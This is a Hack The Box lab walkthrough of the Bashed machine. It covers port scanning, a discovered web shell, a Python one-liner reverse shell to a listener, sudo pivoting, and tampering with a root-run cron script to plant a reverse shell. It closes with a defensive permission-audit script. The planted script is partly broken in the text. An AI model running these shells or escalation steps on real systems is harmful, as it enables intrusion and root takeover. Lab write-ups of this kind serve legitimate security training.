Hack The Box walkthrough – Bashed machine

Today, a new walkthrough of the Hack The Box machine Bashed.

It is an easy Linux machine, released in Dec. 2017 and made by Arrexel.

Let’s jump in!


As usual, we start with an nmap enumeration to find out what we are dealing with today:

[email protected]:~/Documents$ nmap -sC -sV -oA nmap
Starting Nmap 7.80 ( ) at 2020-12-11 15:58 EST
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 33.70% done; ETC: 16:01 (0:01:54 remaining)
Nmap scan report for
Host is up (1.0s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 143.57 seconds

It seems we have only an Apache web service running on port 80. Let’s have a look:

It seems to be a site about Arrexel’s dev progress. Nothing interesting so far.

Let’s run a dirbuster scan to see if other pages can be found:

I found interesting files in the dev folder: phpbash.min.php and phpbash.php. Let’s have a look:

Looks like we already have our shell!

I still prefer the shell with netcat:

nc -lvnp 1337
export RHOST="";export RPORT=1337;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'


Running sudo -l, I found out that I can run any command as scriptmanager with sudo, without a password:

[email protected]:/var/www/html/dev$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

With the following command I was able to spawn a shell as scriptmanager:

[email protected]:/var/www/html/dev$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
[email protected]:/var/www/html/dev$ id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)


The linpeas enumeration output shows an uncommon folder, “scripts”, at the filesystem root.

There are 2 files inside:

[email protected]:/scripts$ ls -al
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec 13 13:41 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager 1039 Dec 13 13:41
-rw-r--r--  1 root          root             8 Dec 13 15:00 test.txt
[email protected]:/scripts$ cat
f = open("test.txt", "w")

[email protected]:/scripts$ cat test.txt
[email protected]:/scripts$ 

It appears that the Python script is executed by root every minute to write the file test.txt (test.txt is owned by root, while the script itself is owned by scriptmanager).

Therefore I edited the script to get a reverse shell:

[email protected]:/scripts$ cat
f = open("test.txt", "w")

import socket # For Building TCP Connection
import subprocess # To start the shell in the system

def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # start a socket object 's' 
    s.connect(('', 4242)) # Here we define the Attacker IP and the listening port

    while True: # keep receiving commands from the Kali machine
        command = s.recv(1024) # read the first KB of the tcp socket

        if 'terminate' in command: # if we got terminate order from the attacker, close the socket and break the loop

        else: # otherwise, we pass the received command to a shell process

            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            s.send( ) # send back the result
            s.send( ) # send back the error -if any-, such as syntax error

def main ():

[email protected]:/scripts$ 
nc -lvnp 1337

After waiting 1 minute, I am root!

[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [] from (UNKNOWN) [] 58776
uid=0(root) gid=0(root) groups=0(root)
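
The escalation above works because a script that root runs on a schedule lives in a directory owned and writable by scriptmanager. As an added example (not part of the original walkthrough), the Python check below audits a scheduled job's script and its parent directories for ownership or write bits that let a non-root account change what root executes; the function names and the job.py file name are placeholders, and the sample layout is constructed to mirror the /scripts listing.

```python
import os
import stat
import tempfile

def weak_points(path, trusted_uids):
    """Reasons an account outside trusted_uids could modify path."""
    st = os.stat(path)
    reasons = []
    if st.st_uid not in trusted_uids:
        reasons.append("owner uid not trusted")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons

def audit_job_target(script, trusted_uids=(0,), stop_at="/"):
    """Audit a script run by a root scheduled job and each parent directory
    up to stop_at; write access to any of them allows replacing the script."""
    findings = {}
    current, stop_at = os.path.realpath(script), os.path.realpath(stop_at)
    while True:
        reasons = weak_points(current, trusted_uids)
        if reasons:
            findings[current] = reasons
        parent = os.path.dirname(current)
        if current == stop_at or parent == current:
            return findings
        current = parent

def build_sample(base):
    """Constructed layout mirroring the listing above: a drwxrwxr-- directory
    holding a -rw-r--r-- script (job.py is a placeholder name)."""
    scripts = os.path.join(base, "scripts")
    os.mkdir(scripts)
    target = os.path.join(scripts, "job.py")
    with open(target, "w") as fh:
        fh.write("# placeholder\n")
    os.chmod(target, 0o644)
    os.chmod(scripts, 0o774)
    return scripts, target

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as base:
        scripts, target = build_sample(base)
        # Trust only uid 0, as for a root cron job; stop at the sample root.
        for path, why in audit_job_target(target, (0,), scripts).items():
            print(path, "->", ", ".join(why))
```

On a real host, pass the paths referenced by root's crontab entries and keep the default stop_at="/"; the fix for any finding is root ownership and no group or world write bit on the script and on every directory above it.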